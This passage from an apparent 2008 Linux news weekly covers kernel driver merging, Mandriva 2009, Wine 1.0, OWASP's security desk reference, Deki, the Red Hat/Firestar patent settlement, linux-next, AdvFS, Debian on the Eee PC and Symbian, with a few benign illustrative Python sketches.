     years, these adaptors were treated as if they were Ethernet adaptors,
     which they certainly are not.  When these developers did get around to
     dealing with issues specific to wireless networking, they created
     their own wireless stacks contained within their drivers.  So no
     general wireless framework was created.

     It was only in 2004 that Jeff Garzik started a project to create
     a generic wireless stack for Linux - and he started with a
     stack (HostAP) which, sometime later on, was seen as not being the
     best choice.  So the work on HostAP - late to begin in the first place
     - was eventually abandoned.

 The networking stack which was eventually developed - mac80211 - began
     its life as a proprietary code base created with no community review
     or oversight at all.  Predictably, it had all kinds of problems which
     required well over a year of work to resolve.  Until mac80211 was in
     reasonable shape, there was no real way to get drivers ready for
     inclusion.


The result of all this (and the occasional legal hassle as well) is that
wireless networking on Linux lagged for 
years, and is only now reaching something close to a stable state.  So it
is not surprising that there has been a lot of code churn in this area, or
that things occasionally break.  But it is hard to see how trying to merge
wireless drivers sooner would have helped the situation significantly.


The non-merging of the Nouveau driver - the reverse-engineered driver for
NVIDIA adapters - also has a simple explanation: the developers have not
yet asked for this merge to happen.  Nouveau is not considered to be at a
point where it works yet, and, importantly, there are still user-space API
issues which must be worked out.  Breaking user-space code is severely
frowned upon, so merging of code is nearly impossible if its user-space
interfaces are still in flux.


James Bottomley put
forward another reason why a driver may stay out of the mainline even
though the author would like to see it merged:


	For the record, my own view is that when a new driver does appear
	we have a limited time to get the author to make any necessary
	changes, so I try to get it reviewed and most of the major issues
	elucidated as soon as possible.  However, since the only leverage I
	have is inclusion, I tend to hold it out of tree until the problems
	are sorted out.


In other words, their control over access to the mainline tree is the one
club subsystem maintainers have at hand when they feel the need to push a
developer to make changes to a driver.  It may well be that simply merging
drivers regardless of technical objections (something which a number of
developers are pushing for) will reduce the incentive for developers to get
their code into top shape - and it's not always clear that others will step
in and do the work for them.

On the other hand, the idea that in-tree code tends to be less buggy than
out-of-tree code is relatively uncontroversial.  So, for many drivers at
least, a "merge first and fix it up later" policy may well lead to the best
results in the shortest period of time.  One thing that is clear is that
this discussion will not be going away anytime soon; chances are good that
this year's kernel summit (happening in September) will end up revisiting
the issue.

		Looking ahead to Mandriva 2009


Mandriva developer Adam Williamson recently
announced the plans for Mandriva Linux 2009.  The schedule and other
details are available on the 2009 development
wiki.

There will be two alpha releases, two beta releases and two release
candidates before the final release in October 2008.  The first alpha will
be available very soon as the scheduled date is June 25, 2008.  As usual,
Mandriva 2009 will be available in the Free, One (live CD) and PowerPack
editions.

So what's in store?   Users of Cooker, Mandriva's development branch, will
have already noticed the churn as gcc is upgraded to 4.3.  There's also the
switch to newer technologies such as libata and PolicyKit.  The final
kernel is not yet fixed but will likely be 2.6.26, with server, desktop and
desktop586 flavors.

The technical specifications are available in SVN, where they are changed to
reflect progress.  I looked at the PDF
snapshot for more information.

KDE 4.1 and GNOME 2.24 will both be available, along with updated packages
such as OpenOffice.org 3 and Firefox 3.  There's a new design for the
installer, and a live distribution upgrade mode for MandrivaUpdate.  The
package management tools will be smarter about the removal of packages that
are no longer required.  The Windows migration tools have also gotten
smarter, making it easier than ever for new users to get started with
Linux.

That's just the beginning.  There is much more coming up in Mandriva Linux
2009.

		The Wine project releases version 1


Wine (Wine Is Not an Emulator)
is one of the long-standing Windows interoperability projects that
runs under Linux and other Unix-based systems:


Wine is an Open Source implementation of the Windows API on top of X, OpenGL, and Unix.
Think of Wine as a compatibility layer for running Windows programs. Wine does not require Microsoft Windows, as it is a completely free alternative implementation of the Windows API consisting of 100% non-Microsoft code, however Wine can optionally use native Windows DLLs if they are available. Wine provides both a development toolkit for porting Windows source code to Unix as well as a program loader, allowing many unmodified Windows programs to run on x86-based Unixes, including Linux, FreeBSD, Mac OS X, and Solaris. Wine is free software, released under the GNU LGPL.


Although Wine is not game-specific, the ability to run Windows games has
always been one of the major driving forces behind Wine.
The Wine AppDB page
lists the numerous Windows applications that have been made to
work under Wine.  Photoshop CS2 stands out as one of the few highly popular
Wine-compatible Windows applications that is not a game.


The
Wine Features
document lists Wine's capabilities; it is capable of running
DOS through Windows XP applications, but Windows Vista
compatibility is not yet mentioned.
The About Wine
document explores the project's
history,
contributors,
myths
and more.
The history document details the magnitude of the project:
"Wine has grown to over 1.4 million lines of C code over the past decade. Nearly 700 people have contributed in some fashion. As always, you can expect Wine to be released sometime this year; or maybe early next year."


Version 1.0 of Wine was
announced
(see the 
LWN reader comments)
on June 17, 2008:


The Wine team is proud to announce that Wine 1.0 is now available.
This is the first stable release of Wine after 15 years of development
and beta testing. Many thanks to everybody who helped us along that
long road!


There have been a series of Wine 1.0 release candidates over the
last month involving a ton of bug fixes, janitorial code work,
translation improvements and more.  The details are available in
the series of release notes for
RC1,
RC2,
RC3,
RC4,
RC5
and finally

version 1.0.


Binary packages and source code for Wine 1.0 are
available
for download.  While fairly unusual for most open-source projects,
a commercial distribution of Wine known as CrossOver is available from
CodeWeavers.
CrossOver Linux 7.0, which is synchronized with Wine 1.0, was
announced this week.


		The Application Security Desk Reference


The Open Web Application
Security Project (OWASP) has undertaken an ambitious project to create
a reference manual (in the same vein as the Physician's Desk
Reference) covering application security.  The book, along with a
companion wiki, is
meant to be the starting point for researchers, developers, and code
reviewers when performing a number of security-related tasks.  The book is
currently in an alpha state, with OWASP looking for more reviewers and
authors to get 
the book into a finished state by August.


The Application
Security Desk Reference (ASDR) will be a 900+ page book,
extensively tagged—cross-referenced in the wiki—to provide a multi-dimensional view of security
threats, attacks, vulnerabilities, and impacts.  The book introduces a set
of principles that will help guide developers in avoiding these problems
along with controls (aka countermeasures) to evade or eliminate them.  The
authors provide a
description of why they took this approach:

Application security information cannot be organized into a one-dimensional
taxonomy that is useful for all
purposes, although many have tried. For example, organizing application
security by vulnerability helps tool
vendors, but makes it very difficult for architects to select
controls. We've adopted the folksonomy tagging
approach to solving this problem. We simply tag our articles with a number
of different categories. You can use
these categories to help get different views into the complex,
interconnected set of topics that is application
security.
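
The tagging approach described in that passage amounts to a many-to-many
index between articles and categories.  A minimal Python sketch follows;
the article titles and tag names are made up for illustration and are not
taken from the ASDR itself.

```python
from collections import defaultdict

# Hypothetical articles and tags, invented for illustration only.
ARTICLES = {
    "SQL injection": {"attack", "input-validation", "database"},
    "Unvalidated input": {"vulnerability", "input-validation"},
    "Least privilege": {"principle", "access-control"},
}


def build_index(articles):
    """Invert article -> tags into tag -> set of article titles."""
    index = defaultdict(set)
    for title, tags in articles.items():
        for tag in tags:
            index[tag].add(title)
    return index


def view(index, *tags):
    """Return the titles carrying every one of the given tags, sorted."""
    if not tags:
        return []
    sets = [index.get(tag, set()) for tag in tags]
    return sorted(set.intersection(*sets))


INDEX = build_index(ARTICLES)
```

Asking for a single tag gives one "view" of the material; asking for
several tags at once narrows it, which is the multi-dimensional lookup that
a single fixed taxonomy cannot provide.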


The PDF 0.9 version is available, and it is already
quite useful, though there is still a fair amount of work to do.  An
important goal is to provide a foundation: 

The ASDR is helpful as basic reference material when performing such
activities as threat modeling, security
architecture review, security testing, code review, and metrics. We intend
to encourage understanding and
consistency when discussing these basic foundational elements of
application security. Security only works if
people can make informed decisions about risk. The ASDR provides that basic
information to help ensure all
stakeholders are involved.


Technical books have an unfortunate tendency to rapidly go stale because the
industry moves so quickly.  Maintaining the wiki will help alleviate this
problem by allowing for a dynamic
reference that can be periodically produced in dead tree form as well.
Much of this kind of information can be found in books and on the web, but
collecting it up into one place is very valuable.


Three sections of the current draft stand out as being closest to
completion: Principles, Attacks, and Vulnerabilities.  Principles contains
17 basic things to keep in mind as part of gaining a "security
consciousness".  It defines terms in clear language and provides reasons why
the principle should be followed.  An example:

Security through obscurity is a weak security control, and nearly always
fails when it is the only control. This is not
to say that keeping secrets is a bad idea, it simply means that the
security of key systems should not be reliant
upon keeping details hidden.


More than 50 attacks are listed, along with examples and concise
descriptions.  In addition, there are several hundred vulnerabilities
listed, each with examples as well as information on which platforms or
languages are affected.  It clearly sets out to be a clearinghouse of
application security information and looks like it is succeeding in that.


For anyone with an interest in security, it is well worth a look. For those
who are skilled in security techniques, assisting with the review and
content creation might be in order.  


		Deki helps Mozilla developers collaborate


There was undoubtedly plenty of activity this week at the Mozilla Developer
Center ahead of the release of Firefox 3. Thanks to a special tool
created by the team at MindTouch
and implemented into its latest product offering, Deki, Mozilla developers all
across the globe were able to view the site in their native tongue.  

The "polyglot" language feature is only one of several components that
make up Deki, an open source collaboration tool for communities
and the enterprise. The polyglot can distinguish between different
languages across a single system so it's no longer necessary for IT
professionals to allocate sections of a web site's infrastructure to
overcome language barriers. Instead, multiple languages are consolidated
into one system and a site's pages are then localized according to user
settings. 

Deki functions much like a traditional wiki, but with
more features and practical applications. In fact, the company originally
called the product "Deki Wiki" but realized it was too limiting and
recently dropped "Wiki" from the name altogether. Developers can use Deki
as a way to organize and aggregate project data, share documents and media,
or even author and create collaborative applications from the ground
up. Groups and organizations also use Deki as a platform for managing a
large knowledge base, coordinating team-based projects, or as a file
repository.  

Deki is part application, part platform. It behaves much the same way as
other content management frameworks like Drupal and Joomla!, but has the
underpinnings of 
a wiki that give it collaborative features as well. Furthermore, everything
under Deki's hood can be accessed via the API on which it was built, and
can be extended in any programming language. 

At the heart of the platform is MindTouch Dream, which forms the
application's architecture, and uses Deki as its interface. It's a .NET
representational
state transfer (REST) framework that runs on .NET 2.0 and
Mono 1.2 — .NET 
runs on Microsoft Windows Servers 2003 and 2008, while Mono runs on Debian,
Fedora, Ubuntu, openSUSE, and Apple OS X (see the web
site for complete details). Data manipulation is done in XML using
standard HTTP verbs, and data conversions to PHP, JSONP, etc. are done
automatically behind the scenes. Licensed under the GNU GPL and LGPL,
together Deki and Dream can be completely customized and scaled to the
needs of any size organization. 

Company co-founders Aaron Fulkerson and Steve Bjorg were approached last
winter by Mozilla's Chief Evangelist Mike Shaver about implementing Deki in
time for the upcoming re-launch of its Developer Center. "Mike had reviewed
our API and architectural documentation and he was enthusiastic about
MindTouch Deki," recalls Fulkerson. "Later on the phone, we discussed
Mozilla's needs, pains, and how MindTouch Deki seemed to be the perfect
solution. We also day-dreamed a little about what the Mozilla community
might build on the MindTouch platform. By my recollection, we both were
pretty excited about the opportunity." 

Given the Developer Center's wide geographical reach, barriers were to
be expected as it struggled to cater to a group that collectively spoke
dozens of different languages. In response, Bjorg and Fulkerson put
together a design that allows for a multi-lingual Web site that scales as
needed. As Mozilla's needs grow, additional languages can easily be added
by translating a single file and submitting it for inclusion
in the official Deki build. In fact, all current translations have come
from the community, and more are on the way. 

Deki isn't just for large organizations. Development
platform-as-a-service provider Bungee
Connect uses it as a documentation repository at the moment, but
according to the Director of Bungee Connect's Developer Community, Ted
Haeger, the plan is to soon make it the community platform for its
Developer Network. "Our developers are very interested in programmable Web
technologies, and Deki will allow us to provide them the most
feature-complete wiki API we have seen yet. We expect to see some
interesting and exciting things built by combining Bungee Connect and
MindTouch Deki," he says. 

The decision to choose Deki over other similar options "was driven
overwhelmingly by the architecture of the product. Because Deki provides a
complete RESTful API,
it makes it an extremely attractive offering for us," notes Haeger. 

Indeed, he considers the API Deki's best feature. "MindTouch has done an
outstanding job with it," Haeger says. "Additionally, they have written
their PHP front-end to the Deki API, which means that the API is central to
the product rather than an afterthought. However, we should note that
Deki's default PHP user interface is extremely polished, too. That combined
with other must-haves, such as a permissions system that is considerably
more flexible than what other wikis provide, helped solidify our decision." 

Though there are varying levels of support options available, Haeger
says Bungee Connect hasn't yet decided which to choose. They do plan,
however, to lean on MindTouch for assistance as they migrate company
documentation from MediaWiki to Deki. For organizations planning to take on the
task 
themselves, Fulkerson points to the helpful
guide on its site and the MediaWiki to Deki converter they have
written: "As we always have done, we've 
released the source code to our public SVN repository. It's stable and has
had generous test coverage, but this should be considered a beta release." 

As Deki continues to gain traction in the enterprise as an agile content
management system, Fulkerson and Bjorg say they knew they were on to
something when they caught wind of the first user-organized conference held
in Belgium last fall. Notes Fulkerson, "This was a pretty clear indication
people liked what we're doing."

		A belated look at the Red Hat/Firestar patent settlement


On June 11, Red Hat announced
that it had reached a settlement in the software patent lawsuit it was
defending against Firestar Software, Inc. and DataTern, Inc.  This
settlement is of interest to the community; it may point toward how
such cases may go in the future.  Unfortunately, the amount of information
which has been released so far leaves as many questions as answers,
including the fundamental question of whether this settlement is as good
for the community as Red Hat is claiming.


The suit involves patent
#6,101,502, which claims the concept of creating an impedance-matching
layer to connect relational databases to object-oriented applications.  The
first claim reads like this:


	1. A method for interfacing an object oriented software application
	with a relational database, comprising the steps of:

selecting an object model;
generating a map of at least some relationships between schema in the
	database and the selected object model; 
employing the map to create at least one interface object associated
	with an object corresponding to a class associated with the object
	oriented software application; and 
utilizing a runtime engine which invokes said at least one interface
	object with the object oriented application to access data from the
	relational database.


One might well wonder how object-oriented programmers managed before 1998,
when this patent was filed.  Firestar claimed that a piece of JBoss
violated the patent and duly filed suit; Red Hat has been fighting back
ever since.  The June 11 announcement appears to bring an end to this
particular dispute.
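
To make the claimed steps concrete, here is a minimal sketch of such a
layer using Python's standard sqlite3 module.  It illustrates the general
technique only; it is not the JBoss code at issue, and the Person class,
the people table, and the MAP dictionary are names invented for this
example.

```python
import sqlite3
from dataclasses import dataclass


# Step 1: an object model (hypothetical, for illustration).
@dataclass
class Person:
    ident: int
    name: str


# Step 2: a map between the database schema and the object model.
# Keys are object attributes, values are column names.
MAP = {"table": "people", "fields": {"ident": "id", "name": "full_name"}}


# Steps 3 and 4: an interface object built from the map, used at run time
# to fetch rows and turn them into objects.
class Mapper:
    def __init__(self, conn, cls, mapping):
        self.conn, self.cls, self.mapping = conn, cls, mapping

    def get(self, ident):
        fields = self.mapping["fields"]
        columns = ", ".join(fields.values())
        sql = (
            f"SELECT {columns} FROM {self.mapping['table']} "
            f"WHERE {fields['ident']} = ?"
        )
        row = self.conn.execute(sql, (ident,)).fetchone()
        if row is None:
            return None
        # Pair attribute names with the returned column values.
        return self.cls(**dict(zip(fields.keys(), row)))


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE people (id INTEGER PRIMARY KEY, full_name TEXT)")
conn.execute("INSERT INTO people VALUES (1, 'Ada Lovelace')")
person = Mapper(conn, Person, MAP).get(1)
```

The application only ever sees Person objects; the column names and SQL
stay inside the mapping layer.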

While Red Hat has not agreed that it was in violation of this patent, the
company did not reach a settlement which clears it of infringement.
Instead, Red Hat agreed to license the patent for itself and for its
customers.  The thing that
makes this settlement a little more interesting is that Red Hat did not
stop there; it also obtained a license for the project's upstream
developers.  From the
settlement FAQ posted by the company:


	Upstream developers receive a perpetual, fully paid-up,
	royalty-free, irrevocable worldwide license to the patents in suit
	to engage in any and all activities with respect to a predecessor
	version of a Red Hat product. Those developers also receive a
	perpetual covenant not to sue with regard to all of DataTern's and
	Amphion's other patents on claims related to Red Hat products.


The press release adds:


	The settlement also protects derivative works of, or combination
	products using, the covered products from any patent claim based in
	any respect on the covered products. Essentially, all that have
	innovated to create, or that will innovate with, software
	distributed under Red Hat brands are protected, as are Red Hat
	customers.


So, in other words, this license and covenant covers the "predecessor
versions" of any package shipped by Red Hat.  Once a particular project
finds its way into RHEL, it's part of the deal.

This very carefully-worded text leaves one very interesting question open:
what about users of the software who are not Red Hat
customers?  It would appear that developers are covered, presumably even as
they develop the program beyond the "predecessor version" shipped by Red
Hat.  It has been made abundantly clear that Red Hat's customers are
covered.  There is a lot of text in the press release and FAQ suggesting
that non-customer users should be protected too, but that is never said
explicitly.  An omission like that in a carefully-written, lawyer-vetted
document can speak loudly; one must wonder what is going on.

Another interesting question is this: what about all of the other projects
out there which are using object-relational glue layers?  One can only
assume that this set includes just about every object-oriented application
which is using a
relational database.  The language makes it pretty clear that this patent
has not been licensed for free software in general; it only applies to the
specific piece of JBoss which was under dispute.  The press release claims
that the settlement covers derivative works, leading one to imagine that
it would be possible to incorporate some small function from JBoss into an entirely
unrelated project and get the patent license with it.  But there is no way
to know whether this interpretation matches the real settlement or not.

And therein lies the real problem at this time: the actual terms of the
settlement, and of the licenses and covenants, have not been published.
One presumes that will change at some point; your editor queried Red Hat on
when that might be, but did not receive an answer by the time this article
was written.  Without knowing what the actual agreement is, nobody can
really assume that they have received any protection at all.

One other claim from the FAQ merits attention:


	The settlement should encourage the open source community by
	providing broad protection as to the patents covered by the
	agreement. More generally, the settlement demonstrates Red Hat's
	commitment to standing up for the community against patent
	aggressors. We believe it will serve as a precedent that should
	discourage future similar cases.


All of this is somewhat debatable, and needs to be questioned.  As noted
above, the actual breadth of the protection obtained is yet to be
disclosed.  The more relevant question, though, is: did Red Hat really
"stand up for the community" in this case, and will it discourage these
cases in the future?  Your editor is not convinced of either.


The way to stand up against this patent aggressor would have been to
invalidate the patent and put an end to it forevermore.  A quick trip to
your editor's bookshelf turned up David Taylor's Business Engineering
With Object Technology, dated 1995, which discusses difficulty with
relational databases and impedance-matching layers.  Grady Booch's
Object Solutions (1996) says: "Thus, it is reasonable to
approach the design of a data-centric system by devising a thin
object-oriented layer on top of a more traditional relational database
technology."  Or look at Object-Oriented Modeling and Design
by Rumbaugh et al. (1991), which has an entire chapter on mapping objects
into relational databases.


In other words, there can be no
shortage of prior art in this case; this is not an idea which was first
conceived in 1998.  But, rather than take this approach, Red Hat chose to
settle.  It is not said anywhere, but chances are good that some money
changed hands here, and, by accepting a license for this patent, Red Hat
has given it some legitimacy.  Other free software projects - those which
Red Hat does not ship - have apparently been left open to the same attack.
Is this really the way to "discourage future
similar cases"?

Of course, such criticism is easy to make from the sidelines; it's easy for
those of us not directly involved in the suit to claim
that Red Hat should have taken the higher-risk, higher-expense road and
fought this case to the end.  There is no doubt that such an approach would
be better for the community - assuming Red Hat prevailed - but Red Hat's
management must make its own choices about which battles it is to fight.
Given that it chose to settle, Red Hat clearly tried to do the right thing
by obtaining some sort of protection for the community beyond its customer
base.  Time will tell how well that will work out and whether it will serve
as a model for future settlements or not.

		A day in the life of linux-next


The merge window phase of the kernel development cycle is a hectic time.
Over a period of about two weeks, between 5,000 and 10,000
changesets find their way into the mainline git repository.  Simply
managing that many patches would be hard enough, but the job is made more
complicated by the fact that these changesets are not all independent of
each other.  The
first changes to be merged can change the code base in ways that cause
later patches to fail to apply.  So merge windows have traditionally
required maintainers to rework their queued patches to resolve
conflicts which arise as other trees are merged.  Given the tight time
constraints (patches which aren't ready when the merge window closes
generally sit out until the next cycle
starts), this integration process has been known to put a fair amount of
pressure on subsystem maintainers.


The other person feeling the stress was Andrew Morton; one of his many jobs
was to bash subsystem trees together in his -mm releases.  That took a lot
of his time and didn't really solve the problem in the end; much of the
work which shows up in -mm isn't necessarily intended for the next
development cycle.  The end result of all this is that each merge window
brought together large amounts of code which had never been integrated
before.


Back in February, the linux-next tree was announced as a way to help ease
some of these problems.  We are now nearing the end of the first full
development cycle to use linux-next, so it's worth taking a look to see how
it is working out.


The idea behind this tree is relatively simple.  Linux-next maintainer
Stephen Rothwell keeps a list
of trees  (maintained with git or quilt) which
are intended to be merged in the next development cycle.  As of this
writing, that list contains 95 trees, all full of patches aimed at 2.6.27.
Once a day, Stephen goes through the process of applying these trees to the
mainline, one at a time.  With each merge, he looks for merge conflicts and
build failures.  The original
plan for linux-next stated that trees causing conflicts or build
failures would simply be dropped.  In reality, so far, Stephen usually
takes the time to figure out the problem; he'll then fix up or drop an
individual patch to make everything fit again.
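
The daily procedure can be sketched as a simple loop.  The following Python
model is an illustration only, not Stephen's actual scripts: trees are
reduced to sets of touched file names, a "conflict" is any overlap with
what has already been merged, and the tree names are invented.  It follows
the original plan of dropping a conflicting tree outright rather than
fixing it up by hand.

```python
def integrate(trees):
    """Merge trees in list order; drop any tree that conflicts.

    `trees` is a list of (name, set_of_files) pairs.  Two trees are
    treated as conflicting when they touch the same file, which is a
    deliberately crude stand-in for a real merge conflict.
    """
    merged_files = set()
    merged, dropped = [], []
    for name, files in trees:
        if merged_files & files:
            # Overlaps with something merged earlier: leave it out today.
            dropped.append(name)
        else:
            merged_files |= files
            merged.append(name)
    return merged, dropped


# Hypothetical trees; the names and files are made up.
TREES = [
    ("net", {"net/core/dev.c"}),
    ("scsi", {"drivers/scsi/sd.c"}),
    ("late-cleanup", {"net/core/dev.c", "kernel/sched.c"}),
]
merged, dropped = integrate(TREES)
```

In this model the tree listed last is the one that gets dropped, because a
conflict only becomes visible when the later of two overlapping trees is
applied.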

When this process is done, he releases the result as the linux-next tree
for the day.  Others then grab it and perform build testing on it; some
people even boot and run the daily linux-next releases.  All this results
in a steady stream of problem reports, small fixes, patches moving from one
tree to another, and so on - various bits of integration work required to
make all of the pieces fit together nicely.


There is an interesting sort of implicit hierarchy in the ordering of the
trees.  Subsystem trees which are merged early in the process are less
likely to run into conflicts than those which come later.  When two trees
do come into conflict, it's the owner of the later tree - the one which
actually shows the conflict - who feels the most pressure to fix things
up.  The history so far, though, shows that there has been very little in
the way of finger-pointing when conflicts arise, as they do almost every
day.  All of the developers understand that they are working on the same
kernel, and they share a common interest in solving problems. 



So, thus far, linux-next appears to be functioning as intended.  It is
serving as an integration point for the next kernel and helping to get
many of the merging problems out of the way ahead of time.  One aspect of
this whole system remains untested, though: the movement of patches from
linux-next into the mainline.  As things stand now, there is no automatic
movement between the trees; instead, maintainers will send their pull
requests directly to Linus as always.  If Linus refuses to merge certain
trees, or if he merges them in an order different from their ordering in
linux-next, integration problems could return.  In the end, it seems like
linux-next will have to drive the final integration process more than is
anticipated now, but it will probably take a few development cycles to
figure out how to make it all work.


Meanwhile, anybody who is interested in 2.6.27 can, to a great extent, run
it now by grabbing linux-next.  This tree has clarified one aspect of the
development process: the 2-3 month "development cycle" run by Linus
is, in fact, just the tip of the kernel development iceberg.  It is the
final integration and stabilization stage.  Linux-next nearly doubles the
length of the visible development cycle by assembling the next kernel long
before Linus starts working on it.  And even linux-next only comes into
play toward the end of a patch's life.


In the past, Linus has pointedly worked to avoid overlapping the
development and stabilization phases of the development cycle.  There was
no development tree at all for almost a year while 2.4 was beaten into
reasonable shape.  This separation was maintained out of a simple fear that
an open development tree would distract developers from the more important
task of finding and fixing bugs in the current stable release.


That separation is a thing of the past now; there are literally dozens of
development trees which are open for business at all times.  That can only
be worrisome to those who are concerned about the quality of kernel
releases; why should developers concern themselves with 2.6.26 bugs when 2.6.27 is being
assembled and 2.6.28 is already on the radar?  Whether such concerns are
valid is likely to be a matter of ongoing debate.


Meanwhile, however, linux-next appears to have settled in as a long-term
feature of the kernel development landscape.  It is serving its purpose as
a place to find and resolve integration problems; it has also had the
effect of taking much of that integration work off of Andrew Morton's
shoulders.  And that, in turn, should free him to spend more time trying to
get developers to fix all those bugs.


(See the linux-next
wiki for more information on how to work with this tree).

		What's AdvFS good for?


On June 23, HP announced that
it was releasing the source for the "Tru64 
Advanced Filesystem" (or AdvFS) under version 2 of the GPL.  This is,
clearly, a large release of code from HP.  What is a bit less clear
is what the value of this release will be for Linux.  In the end, that
value is likely to be significant, but it will probably be realized in
relatively indirect and difficult-to-measure ways.


AdvFS was originally developed by Digital Equipment Corporation for its
version of Unix; HP picked it up when it acquired Compaq, which had
acquired DEC in 1998.  This filesystem offers a number of the usual
features.  It is intended to be a high-performance filesystem, naturally.
Extent-based block management and directory indexes are provided.
It does journaling for fast crash recovery.  There is an undelete feature.
AdvFS is also designed to work in clustered environments.


Much of the thought that went into AdvFS was concerned with avoiding the
need to take the system down.  There is a snapshot feature which
can be used to make consistent backups of running systems.  Defragmentation
can be done online.  There is a built-in volume management layer which
allows storage devices to be added to (or removed from) a running
filesystem; files can also be relocated across devices.  The internal
volume manager can perform striping of files across devices, but nothing
more advanced than that; AdvFS will happily work on top of a more capable
volume manager, though.


There are a few things which AdvFS does not have.  There is no checksumming
of data, and, thus, no ability to catch corruption.  Online filesystem
integrity checking does not appear to be supported.  The maximum filesystem
size (16TB) probably seemed infinite in the early 1990s, but it's starting
to look a little tight now.


In general, AdvFS looks like something which was a very nice filesystem 
ten or fifteen years ago, but it has little that is not either available in
Linux now, or 
in the works for the near future.  And AdvFS doesn't even work with Linux -
no porting effort has been made, and it's not clear that one will be made.
So is this release just another dump of code being abandoned by its
corporate owner?


One could begin to answer by saying that, even if this were true, it
would still be welcome.  If a company gives up on a piece of code, it's far
preferable to put it out for adoption under the GPL than to let it rot
until nobody can find it anymore.  But there may well be value in this
release.


Even if there is no point in trying to make it work under Linux, the AdvFS
code is the repository of more than a decade of experience of making a
high-end filesystem work in a commercial environment.  Your editor had
stopped working with DEC systems by the time AdvFS came out, but the word
he heard from others is that the early releases were, shall we say,
something that taught
administrators about the value of frequent backups.  But after a few major
releases, AdvFS had stabilized into a fast, solid, and reliable
filesystem.  The current code will embody all of the hard lessons that were
learned in the process of getting to that point.


Chris Mason, who is currently working on the Btrfs filesystem, puts it this way:


	The idea is that well established filesystems can teach us quite a
	lot about layout, and about the optimizations that were added in
	response to customer demand.  Having the code to these
	optimizations is very useful.


Having that code licensed under the GPL is especially useful: any code
which is useful in its current form can be pulled quickly into Linux.  And,
even when the code itself cannot be used, the ideas that it embodies can be
borrowed without fear.  And that is exactly
what HP was hoping to encourage with this release:


	In case its not clear, this is a GPLv2 technology release, not an
	actual port to Linux.  We're hoping that the code and documentation
	will be helpful in the development of new file systems for Linux
	that will provide similar capabilities, and perhaps used to make
	tweaks to existing file systems.


And that would appear to be likely to happen.  Over time, the best ideas
and experience from AdvFS should find their way into the filesystems
supported by Linux, even if AdvFS, itself, never becomes one of those
filesystems.  So HP has made a significant contribution to the kernel
development process, one which will probably never show up in the changeset
counts and other easily-obtained metrics.


(Those interested in learning more about AdvFS would be well advised to
grab the documentation tarball from the AdvFS sourceforge page.  The
"Hitchhiker's guide" is a good starting place, though, at 229 pages, it's
not for hitchhikers who prefer to travel light.)


		Debian Lenny and the Eee PC?


The ASUS Eee PC, a subnotebook computer, was first introduced at
COMPUTEX Taipei 2007.  The first models came with a modified version of the
Xandros operating system.  Xandros
has roots in Debian, and strives to be easy-to-use for first time Linux
users and Windows-centric businesses.  The company has never been afraid of
using proprietary components to make that happen, which has made it less
popular with free software fans.

The little PCs, meanwhile, proved to be very popular.  According to Wikipedia, ASUS sold
over 300,000 units in 2007.  Microsoft must have felt left out, so the next
generation of the little notebooks was available with a modified version
of XP.  At the 2008 COMPUTEX, DistroWatch noted
that "not all was well at the ASUS stand. As a visitor
interested in Linux, I was disappointed to find just one of the products on
display running the open source operating system. Even worse was the fact
that the entire area was plastered with advertisements displaying large
Windows and Microsoft logos. The only flyer available at the stand was a
Microsoft one entitled 'It's better with Windows'."

Naturally, the free software community has been working on free Linux
variants to run on these small boxes.  The most notable projects are EeeDora, a Fedora-based
variant, and the DebianEeePC
project.

Now it seems the Debian effort may have a chance at becoming an official
OS for the 2009 Eee PC.  In a recent
post to the Debian-eeepc-devel
mailing list, Ben Armstrong says, "I just received an encouraging
note from Ellis Wang of Asus in Taiwan following up on Martin Michlmayr's
suggestions to Asus about how they could work more closely with the Debian
community.  Ellis has assigned Robert Huang the task of putting a working
relationship in place between Asus and Debian, with backup provided by five
other Asus employees."

It would be great if ASUS would make pre-installed Debian Eee PC models.
But even if they don't, free software enthusiasts can install their choice
of EeeDora or custom Debian for themselves.

		Symbian to be another open mobile platform


The already crowded open source mobile phone software market just got more
crowded: Nokia has announced plans to open up the Symbian operating
system.  Symbian currently has the biggest installed base of any mobile
OS, which makes this announcement somewhat more surprising—market leaders
generally do not radically change their successful methods.  What it means
for the various Linux mobile phone initiatives is unclear, but it certainly
shakes things up a bit. 


Nokia, along with many of the biggest players in the mobile phone market,
has formed the Symbian
Foundation to provide its members with the OS on a royalty-free basis.
Several other components are being donated to the foundation as well, to
create a complete
platform for mobile applications.  The plan is for all of the code to be
released using the Eclipse Public License over the next two years.


In order to own the code, Nokia is purchasing the 52% of Symbian Limited
that it does not currently own for more than $400 million. This will allow
Nokia to donate Symbian, along 
with its S60 smartphone platform, which runs atop Symbian, to the
foundation.  Sony Ericsson and 
Motorola will donate their UIQ user interface layer, while NTT DoCoMo will
donate its Mobile Oriented Application Platform (MOAP).


Nearly two dozen companies have come together to form the foundation,
including handset makers, mobile carriers, and chip manufacturers.
Interestingly,
there is substantial overlap between Symbian Foundation members and those
of the Open Handset
Alliance—the umbrella organization for Google's Android
effort—and the LiMo Foundation.
Whether this reflects impatience with the pace of Android/LiMo development or
just an
effort to hedge their bets remains to be seen.     


Membership in the foundation is open to all who are willing to pay the
$1500 annual membership fee.  That fee will allow the use of all of the
components that make up the Symbian platform on a royalty-free basis.
Developers who wish to create software for the platform need not join,
as there will be a developer program available at no charge.  The
foundation is expected to start operations in 2009. 


Opening up Symbian is seen as a reaction to Android and other free software
efforts in the mobile phone space.  One of the advantages touted for Linux
solutions is the zero cost—particularly the lack of per-unit
royalties.  By moving Symbian to this model, the foundation undercuts that
advantage.  Because Symbian is already a dominant player in the smartphone
market—with a large development community—there are some who
believe it will redirect efforts currently focused on Linux to Symbian.


That remains to be seen, of course, but Linux-based smartphones are still
in their infancy.  MontaVista's Mobilinux has been installed in more than
35 million mobile devices, mostly in Asian markets, but, perhaps because
it is controlled by a single company, it hasn't really generated a large
developer community.  It may also be targeting mobile carriers who are not
very interested in allowing users to customize their phones—at least
not to the extent Android and others envision.


There is a widening rift between the "free" and "locked down" camps for
mobile devices.  With this move, Nokia—and the other foundation
members—seem to be moving toward allowing 
users more freedom, though undoubtedly some handset makers and carriers
will opt for locking down their phones regardless of the openness of the
underlying OS.  One need look no further than the iPhone
for an example of a tightly controlled application environment that is, at
least so far, very popular with consumers.


In the long run, it is hard to imagine that mobile device users will be
willing to stick with the limited choices of applications provided by their
carrier or phone maker.  As more open alternatives become available, there
will be a pushback 
from handset buyers that will be harder for the carriers to resist.  For
many, their mobile phone is the most sophisticated computer they own, and
the history of personal computers would indicate that a thriving ecosystem
of third-party applications is an important part of the purchasing
decision.  That requires developers.


The current proliferation of open mobile phone software platforms is, in
